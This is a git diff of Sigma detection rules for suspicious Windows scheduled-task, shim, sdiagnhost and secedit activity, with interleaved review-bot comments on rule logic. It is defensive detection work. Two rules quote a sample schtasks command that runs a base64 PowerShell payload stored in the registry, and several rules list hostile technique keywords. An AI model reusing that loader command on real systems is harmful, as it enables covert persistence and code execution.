a/sigma/builtin/process_creation/proc_creation_win_schtasks_guid_task_name.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_guid_task_name.yml index f46aca197..e46bea189 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_guid_task_name.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_guid_task_name.yml 
@@ -18,17 +18,19 @@ detection: EventID: 4688 Channel: Security selection_img: - CommandLine|contains: '/Create ' - NewProcessName|endswith: \schtasks.exe + CommandLine|contains: '/Create ' + NewProcessName|endswith: \schtasks.exe selection_tn: - CommandLine|contains: + CommandLine|contains: + # Can start with single or double quote - /TN "{ - /TN '{ - /TN { selection_end: - CommandLine|contains: + CommandLine|contains: + # Ending of the name to avoid possible FP in the rest of the commandline - '}"' - - '}''' + - "}'" - '} ' condition: process_creation and (all of selection_*) falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml index 59713e66b..d9bb39e95 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml @@ -1,8 +1,7 @@ title: Uncommon One Time Only Scheduled Task At 00:00 id: 970823b7-273b-460a-8afc-3a6811998529 status: test -description: Detects scheduled task creation events that include suspicious actions, - and is run once at 00:00 +description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00 references: - https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte author: pH-T (Nextron Systems) @@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|contains: \schtasks.exe - - OriginalFileName: schtasks.exe + - NewProcessName|contains: \schtasks.exe + - OriginalFileName: schtasks.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - wscript - vbscript - cscript 
@@ -34,7 +33,7 @@ detection: - powershell - \AppData\ selection_time: - CommandLine|contains|all: + CommandLine|contains|all: - once - 00:00 condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_parent.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_parent.yml index 2a00acfc8..73d50ad0a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_parent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_parent.yml @@ -1,8 +1,7 @@ title: Suspicious Add Scheduled Task Parent id: 9494479d-d994-40bf-a8b1-eea890237021 status: test -description: Detects suspicious scheduled task creations from a parent stored in a - temporary folder +description: Detects suspicious scheduled task creations from a parent stored in a temporary folder references: - https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/ author: Florian Roth (Nextron Systems) @@ -19,20 +18,19 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: '/Create ' - NewProcessName|endswith: \schtasks.exe + CommandLine|contains: '/Create ' + NewProcessName|endswith: \schtasks.exe ParentProcessName|contains: - \AppData\Local\ - \AppData\Roaming\ - \Temporary Internet - \Users\Public\ filter: - CommandLine|contains: + CommandLine|contains: - update_task.xml - unattended.ini condition: process_creation and (selection and not 1 of filter*) falsepositives: - - Software installers that run from temporary folders and also install scheduled - tasks + - Software installers that run from temporary folders and also install scheduled tasks level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml index 777f9a209..7cff053f7 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml @@ -1,16 +1,12 @@ title: Potential Persistence Via Microsoft Compatibility Appraiser id: f548a603-c9f2-4c89-b511-b089f7e94549 related: - - id: 73a883d0-0348-4be4-a8d8-51031c2564f8 - type: derived + - id: 73a883d0-0348-4be4-a8d8-51031c2564f8 + type: derived status: test -description: 'Detects manual execution of the "Microsoft Compatibility Appraiser" - task via schtasks. - - In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" - registry key. - - ' +description: | + Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks. + In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key. references: - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/ author: Sreeman @@ -27,10 +23,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + - NewProcessName|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'run ' - \Application Experience\Microsoft Compatibility Appraiser condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_reg_loader.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_reg_loader.yml index 3ea26bf51..28d7c1b8d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_reg_loader.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_reg_loader.yml 
@@ -1,11 +1,10 @@ title: Scheduled Task Executing Payload from Registry id: 86588b36-c6d3-465f-9cee-8f9093e07798 related: - - id: c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78 - type: derived + - id: c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78 + type: derived status: experimental -description: Detects the creation of a schtasks that potentially executes a payload - stored in the Windows Registry using PowerShell. +description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell. references: - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) @@ -23,22 +22,23 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + # schtasks.exe /Create /F /TN "{97F2F70B-10D1-4447-A2F3-9B070C86E261}" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\SOFTWARE\Pvoeooxf).yzbbvhhdypa))) " /SC MINUTE /MO 30 + - NewProcessName|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_cli_create: - CommandLine|contains: /Create + CommandLine|contains: /Create selection_cli_get: - CommandLine|contains: + CommandLine|contains: - Get-ItemProperty - - ' gp ' + - ' gp ' # Alias selection_cli_hive: - CommandLine|contains: + CommandLine|contains: - 'HKCU:' - 'HKLM:' - 'registry::' - HKEY_ filter_main_encoding: - CommandLine|contains: + CommandLine|contains: - FromBase64String - encodedcommand condition: process_creation and (all of selection_* and not 1 of filter_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml index df7332bd6..41ac2e2f2 100644 
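Review bot: The sample command line added as a comment above `selection_img` contains `FromBase64String`, which `filter_main_encoding` excludes, so that example never triggers this rule; it is the trigger for the related encoded-payload rule `c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78` and is misleading here. Replace it with a non-encoded variant such as `# schtasks.exe /Create /TN Updater /TR "powershell -Command IEX((Get-ItemProperty -Path HKCU:\SOFTWARE\Foo).bar)" /SC MINUTE /MO 30`, or add a one-line note that the base64 case is intentionally handed to the related rule. The `condition` line at the end of the hunk confirms the exclusion is deliberate.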
--- a/sigma/builtin/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml @@ -1,12 +1,10 @@ title: Scheduled Task Executing Encoded Payload from Registry id: c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78 status: test -description: Detects the creation of a schtask that potentially executes a base64 - encoded payload stored in the Windows Registry using PowerShell. +description: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell. references: - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ -author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport, X__Junior (Nextron Systems), - Nasreddine Bencherchali (Nextron Systems) +author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) date: 2022/02/12 modified: 2023/02/04 tags: @@ -22,20 +20,21 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + # schtasks.exe /Create /F /TN "{97F2F70B-10D1-4447-A2F3-9B070C86E261}" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\SOFTWARE\Pvoeooxf).yzbbvhhdypa))) " /SC MINUTE /MO 30 + - NewProcessName|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_cli_create: - CommandLine|contains: /Create + CommandLine|contains: /Create selection_cli_encoding: - CommandLine|contains: + CommandLine|contains: - FromBase64String - encodedcommand selection_cli_get: - CommandLine|contains: + CommandLine|contains: - Get-ItemProperty - - ' gp ' + - ' gp ' # Alias selection_cli_hive: - CommandLine|contains: + CommandLine|contains: - 'HKCU:' - 'HKLM:' - 'registry::' 
diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_schedule_type.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_schedule_type.yml index 9a69780b4..2cfa01a27 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_schedule_type.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_schedule_type.yml @@ -1,11 +1,10 @@ title: Suspicious Schtasks Schedule Types id: 24c8392b-aa3c-46b7-a545-43f71657fe98 related: - - id: 7a02e22e-b885-4404-b38b-1ddc7e65258a - type: similar + - id: 7a02e22e-b885-4404-b38b-1ddc7e65258a + type: similar status: test -description: Detects scheduled task creations or modification on a suspicious schedule - type +description: Detects scheduled task creations or modification on a suspicious schedule type references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create @@ -23,18 +22,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + - NewProcessName|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_time: - CommandLine|contains: + CommandLine|contains: - ' ONLOGON ' - ' ONSTART ' - ' ONCE ' - ' ONIDLE ' filter_privs: - CommandLine|contains: - - NT AUT - - ' SYSTEM' + CommandLine|contains: + - NT AUT # This covers the usual NT AUTHORITY\SYSTEM + - ' SYSTEM' # SYSTEM is a valid value for schtasks hence it gets it's own value with space - HIGHEST condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_schedule_type_system.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_schedule_type_system.yml index 62d6a09e3..b7d8aa92a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_schedule_type_system.yml 
+++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_schedule_type_system.yml @@ -1,11 +1,10 @@ title: Suspicious Schtasks Schedule Type With High Privileges id: 7a02e22e-b885-4404-b38b-1ddc7e65258a related: - - id: 24c8392b-aa3c-46b7-a545-43f71657fe98 - type: similar + - id: 24c8392b-aa3c-46b7-a545-43f71657fe98 + type: similar status: test -description: Detects scheduled task creations or modification to be run with high - privileges on a suspicious schedule type +description: Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create @@ -22,22 +21,21 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + - NewProcessName|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_time: - CommandLine|contains: + CommandLine|contains: - ' ONLOGON ' - ' ONSTART ' - ' ONCE ' - ' ONIDLE ' selection_privs: - CommandLine|contains: - - NT AUT - - ' SYSTEM' + CommandLine|contains: + - NT AUT # This covers the usual NT AUTHORITY\SYSTEM + - ' SYSTEM' # SYSTEM is a valid value for schtasks hence it gets it's own value with space - HIGHEST condition: process_creation and (all of selection_*) falsepositives: - - Some installers were seen using this method of creation unfortunately. Filter - them in your environment + - Some installers were seen using this method of creation unfortunately. Filter them in your environment level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml index 029652146..4bc420ae8 100644 
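Review bot: `selection_privs` uses `' SYSTEM'` with a leading space only, while the comment beside it says the value gets its own entry "with space" to isolate the SYSTEM user; as written it also matches any command line with a word starting `System`, for example `/TR "C:\Program Files\Vendor\System Update\x.exe"`, and the schtasks SYSTEM rule in this same update uses `' SYSTEM '`. Because the related rule `24c8392b-aa3c-46b7-a545-43f71657fe98` applies the identical value as an exclusion, each such event is silently moved from that rule into this higher-privilege one rather than dropped, so the mismatch misclassifies rather than loses events. Aligning both rules on `' SYSTEM '` (or matching `/RU SYSTEM` explicitly) removes the ambiguity and makes the comment true.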
--- a/sigma/builtin/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml @@ -1,9 +1,7 @@ title: Suspicious Scheduled Task Creation via Masqueraded XML File id: dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c status: experimental -description: Detects the creation of a scheduled task using the "-XML" flag with a - file without the '.xml' extension. This behavior could be indicative of potential - defense evasion attempt during persistence +description: Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence references: - https://docs.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--xml- - https://github.com/elastic/protections-artifacts/blob/084067123d3328a823b1c3fdde305b694275c794/behavior/rules/persistence_suspicious_scheduled_task_creation_via_masqueraded_xml_file.toml @@ -22,18 +20,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + - NewProcessName|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_cli_create: - CommandLine|contains: + CommandLine|contains: - /create - -create selection_cli_xml: - CommandLine|contains: + CommandLine|contains: - /xml - -xml filter_main_extension_xml: - CommandLine|contains: .xml + CommandLine|contains: .xml filter_main_system_process: MandatoryLabel: S-1-16-16384 filter_main_rundll32: 
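Review bot: `filter_main_extension_xml` matches `.xml` anywhere in the command line, so `schtasks /Create /TN Update.xml /XML C:\Users\Public\task.txt` is excluded even though the file passed to `/XML` has no `.xml` extension, which is exactly the masquerade the rule exists to catch. Tie the check to the `/XML` argument instead; with Sigma's `re` modifier it can be expressed as `CommandLine|re: '[/-][xX][mM][lL]\s+"?[^"\s]*\.[xX][mM][lL]'`, with the caveat that backend support for `re` varies and should be checked for the target SIEM. The `MandatoryLabel` and rundll32 exclusions are unaffected by this change.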
@@ -43,13 +41,13 @@ detection: ParentProcessName|endswith: \rundll32.exe filter_optional_third_party: ParentProcessName|endswith: + # Consider removing any tools that you don't use to avoid blind spots - :\ProgramData\OEM\UpgradeTool\CareCenter_*\BUnzip\Setup_msi.exe - :\Program Files\Axis Communications\AXIS Camera Station\SetupActions.exe - :\Program Files\Axis Communications\AXIS Device Manager\AdmSetupActions.exe - :\Program Files (x86)\Zemana\AntiMalware\AntiMalware.exe - :\Program Files\Dell\SupportAssist\pcdrcui.exe - condition: process_creation and (all of selection_* and not 1 of filter_main_* - and not 1 of filter_optional_*) + condition: process_creation and (all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_susp_pattern.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_susp_pattern.yml index 1126b2db2..cf9fc8c31 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_susp_pattern.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_susp_pattern.yml @@ -1,8 +1,7 @@ title: Suspicious Command Patterns In Scheduled Task Creation id: f2c64357-b1d2-41b7-849f-34d2682c0fad status: experimental -description: Detects scheduled task creation using "schtasks" that contain potentially - suspicious or uncommon commands +description: Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands references: - https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/ - https://twitter.com/RedDrip7/status/1506480588827467785 
@@ -21,14 +20,14 @@ detection: EventID: 4688 Channel: Security selection_schtasks: - CommandLine|contains: '/Create ' - NewProcessName|endswith: \schtasks.exe + CommandLine|contains: '/Create ' + NewProcessName|endswith: \schtasks.exe selection_pattern_1: - CommandLine|contains: + CommandLine|contains: - '/sc minute ' - '/ru system ' selection_pattern_2: - CommandLine|contains: + CommandLine|contains: - cmd /c - cmd /k - cmd /r @@ -36,7 +35,7 @@ detection: - 'cmd.exe /k ' - 'cmd.exe /r ' selection_uncommon: - CommandLine|contains: + CommandLine|contains: - ' -decode ' - ' -enc ' - ' -w hidden ' @@ -45,26 +44,24 @@ detection: - .DownloadData - .DownloadFile - .DownloadString - - '/c start /min ' + - '/c start /min ' # https://twitter.com/RedDrip7/status/1506480588827467785 - FromBase64String - mshta http - mshta.exe http selection_anomaly_1: - CommandLine|contains: + CommandLine|contains: - :\Windows\Temp\ - \AppData\ - '%AppData%' - '%Temp%' - '%tmp%' selection_anomaly_2: - CommandLine|contains: + CommandLine|contains: - cscript - curl - wscript - condition: process_creation and (selection_schtasks and ( all of selection_pattern_* - or selection_uncommon or all of selection_anomaly_* )) + condition: process_creation and (selection_schtasks and ( all of selection_pattern_* or selection_uncommon or all of selection_anomaly_* )) falsepositives: - - Software installers that run from temporary folders and also install scheduled - tasks are expected to generate some false positives + - Software installers that run from temporary folders and also install scheduled tasks are expected to generate some false positives level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_system.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_system.yml index d6655a512..332cabb63 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_system.yml 
+++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_system.yml @@ -1,8 +1,7 @@ title: Schtasks Creation Or Modification With SYSTEM Privileges id: 89ca78fd-b37c-4310-b3d3-81a023f83936 status: experimental -description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" - privileges +description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges references: - https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks @@ -21,23 +20,28 @@ detection: EventID: 4688 Channel: Security selection_root: - CommandLine|contains: + CommandLine|contains: - ' /change ' - ' /create ' - NewProcessName|endswith: \schtasks.exe + NewProcessName|endswith: \schtasks.exe selection_run: - CommandLine|contains: '/ru ' + CommandLine|contains: '/ru ' selection_user: - CommandLine|contains: - - NT AUT - - ' SYSTEM ' + CommandLine|contains: + - NT AUT # This covers the usual NT AUTHORITY\SYSTEM + - ' SYSTEM ' # SYSTEM is a valid value for schtasks hence it gets it's own value with space filter_optional_teamviewer: - CommandLine|contains|all: + # FP from test set in SIGMA + # Cannot use ParentImage on all OSes for 4688 events + # ParentImage|contains|all: + # - '\AppData\Local\Temp\' + # - 'TeamViewer_.exe' + CommandLine|contains|all: - /TN TVInstallRestore - \TeamViewer_.exe - NewProcessName|endswith: \schtasks.exe + NewProcessName|endswith: \schtasks.exe filter_optional_avira: - CommandLine|contains: + CommandLine|contains: - '/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR ' - :\Program Files (x86)\Avira\System Speedup\setup\avira_speedup_setup.exe - /VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART" /RL HIGHEST 
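Review bot: The inline comment on the `' SYSTEM '` entry in `selection_user` has a typo ("it's own") and the sentence is hard to parse; reword it as `# SYSTEM is a valid value for schtasks, hence it gets its own entry with surrounding spaces` so the reason for the space-padded value is clear to the next maintainer. The commented-out hint in `filter_optional_teamviewer` uses the Sysmon field name `ParentImage`, while this builtin 4688 rule uses `ParentProcessName` elsewhere (e.g. the rundll32 and msiexec filters in neighbouring rules); I would write it as `# ParentProcessName|contains|all:` so anyone enabling it does not copy the wrong field name. It may also be worth stating in the comment which OS/version the parent-process field is missing on, since "Cannot use ParentImage on all OSes" does not say what the reader needs to check before enabling it.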
diff --git a/sigma/builtin/process_creation/proc_creation_win_scrcons_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_scrcons_susp_child_process.yml index 48d0d23e0..ff478ea52 100644 --- a/sigma/builtin/process_creation/proc_creation_win_scrcons_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_scrcons_susp_child_process.yml @@ -20,7 +20,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \scrcons.exe - NewProcessName|endswith: + NewProcessName|endswith: - \svchost.exe - \dllhost.exe - \powershell.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_sdbinst_shim_persistence.yml b/sigma/builtin/process_creation/proc_creation_win_sdbinst_shim_persistence.yml index 15f228aac..acbd614e5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sdbinst_shim_persistence.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sdbinst_shim_persistence.yml @@ -1,15 +1,12 @@ title: Potential Shim Database Persistence via Sdbinst.EXE id: 517490a7-115a-48c6-8862-1a481504d5a8 related: - - id: 18ee686c-38a3-4f65-9f44-48a077141f42 - type: similar + - id: 18ee686c-38a3-4f65-9f44-48a077141f42 + type: similar status: test -description: 'Detects installation of a new shim using sdbinst.exe. - - Adversaries may establish persistence and/or elevate privileges by executing malicious - content triggered by application shims - - ' +description: | + Detects installation of a new shim using sdbinst.exe. + Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims references: - https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence author: Markus Neis 
@@ -27,12 +24,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \sdbinst.exe - - OriginalFileName: sdbinst.exe + - NewProcessName|endswith: \sdbinst.exe + - OriginalFileName: sdbinst.exe selection_cli: - CommandLine|contains: .sdb + CommandLine|contains: .sdb filter_optional_iis: - CommandLine|contains: + CommandLine|contains: + # Expected behavior for IIS Express (e.g. https://www.hybrid-analysis.com/sample/15d4ff941f77f7bdfc9dfb2399b7b952a0a2c860976ef3e835998ff4796e5e91?environmentId=120) - :\Program Files (x86)\IIS Express\iisexpressshim.sdb - :\Program Files\IIS Express\iisexpressshim.sdb ParentProcessName|endswith: \msiexec.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_sdbinst_susp_extension.yml b/sigma/builtin/process_creation/proc_creation_win_sdbinst_susp_extension.yml index dcbd6f9c5..331484bc3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sdbinst_susp_extension.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sdbinst_susp_extension.yml 
@@ -1,16 +1,12 @@ title: Uncommon Extension Shim Database Installation Via Sdbinst.EXE id: 18ee686c-38a3-4f65-9f44-48a077141f42 related: - - id: 517490a7-115a-48c6-8862-1a481504d5a8 - type: derived + - id: 517490a7-115a-48c6-8862-1a481504d5a8 + type: derived status: test -description: 'Detects installation of a potentially suspicious new shim with an uncommon - extension using sdbinst.exe. - - Adversaries may establish persistence and/or elevate privileges by executing malicious - content triggered by application shims - - ' +description: | + Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. + Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims references: - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - https://github.com/nasbench/Misc-Research/blob/8ee690e43a379cbce8c9d61107442c36bd9be3d3/Other/Undocumented-Flags-Sdbinst.md @@ -29,21 +25,22 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \sdbinst.exe - - OriginalFileName: sdbinst.exe + - NewProcessName|endswith: \sdbinst.exe + - OriginalFileName: sdbinst.exe filter_main_legit_ext: - CommandLine|contains: .sdb + CommandLine|contains: .sdb filter_main_svchost: - - CommandLine|endswith: - - ' -c' - - ' -f' - - ' -mm' - - ' -t' - - CommandLine|contains: ' -m -bg' + # ParentImage|endswith: ':\Windows\System32\svchost.exe' + - CommandLine|endswith: + - ' -c' + - ' -f' + - ' -mm' + - ' -t' + - CommandLine|contains: ' -m -bg' filter_main_null: - CommandLine: null + CommandLine: filter_main_empty: - CommandLine: '' + CommandLine: '' condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown 
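Review bot: `filter_main_null` now reads `CommandLine:` with an empty value instead of the previous `CommandLine: null`; an empty scalar parses as null in YAML so the match is unchanged, but the intent (exclude events where the field is absent) is no longer visible at a glance, and it sits next to `filter_main_empty: CommandLine: ''` where the distinction between null and empty string is the whole point. I would keep the explicit form, `CommandLine: null`, or add a comment such as `# null: field missing, as opposed to the empty-string case below`. The new commented hint `# ParentImage|endswith: ':\Windows\System32\svchost.exe'` in `filter_main_svchost` uses the Sysmon field name while this 4688 rule uses `ParentProcessName` (see the msiexec filter in the previous file); writing it as `# ParentProcessName|endswith: ...` avoids a copy-paste error when someone enables it.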
diff --git a/sigma/builtin/process_creation/proc_creation_win_sdclt_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_sdclt_child_process.yml index c80053738..e00bd37d4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sdclt_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sdclt_child_process.yml @@ -1,8 +1,7 @@ title: Sdclt Child Processes id: da2738f2-fadb-4394-afa7-0a0674885afa status: test -description: A General detection for sdclt spawning new processes. This could be an - indicator of sdclt being used for bypass UAC techniques. +description: A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/6 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md diff --git a/sigma/builtin/process_creation/proc_creation_win_sdiagnhost_susp_child.yml b/sigma/builtin/process_creation/proc_creation_win_sdiagnhost_susp_child.yml index 7c895dda0..cf87dfa3c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sdiagnhost_susp_child.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sdiagnhost_susp_child.yml @@ -1,8 +1,7 @@ title: Sdiagnhost Calling Suspicious Child Process id: f3d39c45-de1a-4486-a687-ab126124f744 status: test -description: Detects sdiagnhost.exe calling a suspicious child process (e.g. used - in exploits for Follina / CVE-2022-30190) +description: Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190) references: - https://twitter.com/nao_sec/status/1530196847679401984 - https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/ 
@@ -24,7 +23,8 @@ detection: Channel: Security selection: ParentProcessName|endswith: \sdiagnhost.exe - NewProcessName|endswith: + NewProcessName|endswith: + # Add more suspicious LOLBins - \powershell.exe - \pwsh.exe - \cmd.exe @@ -34,7 +34,8 @@ detection: - \taskkill.exe - \regsvr32.exe - \rundll32.exe - - \calc.exe + # - '\csc.exe' # https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/ + - \calc.exe # https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/ condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_secedit_execution.yml b/sigma/builtin/process_creation/proc_creation_win_secedit_execution.yml index 61f83831e..093c8b1e6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_secedit_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_secedit_execution.yml @@ -1,8 +1,7 @@ title: Potential Suspicious Activity Using SeCEdit id: c2c76b77-32be-4d1f-82c9-7e544bdfe0eb status: test -description: Detects potential suspicious behaviour using secedit.exe. Such as exporting - or modifying the security policy +description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy references: - https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit 
@@ -37,16 +36,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \secedit.exe - - OriginalFileName: SeCEdit + - NewProcessName|endswith: \secedit.exe + - OriginalFileName: SeCEdit selection_flags_discovery: - CommandLine|contains|all: + CommandLine|contains|all: - /export - /cfg selection_flags_configure: - CommandLine|contains|all: + CommandLine|contains|all: - /configure - /db + # filter: + # SubjectUserName|endswith: '$' SubjectUserName is from event ID 4719 in the Windows Security log condition: process_creation and (selection_img and (1 of selection_flags_*)) falsepositives: - Legitimate administrative use diff --git a/sigma/builtin/process_creation/proc_creation_win_servu_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_servu_susp_child_process.yml index 51cbe391c..9a6389f9c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_servu_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_servu_susp_child_process.yml @@ -1,8 +1,7 @@ title: Suspicious Serv-U Process Pattern id: 58f4ea09-0fc2-4520-ba18-b85c540b0eaf status: test -description: Detects a suspicious process pattern which could be a sign of an 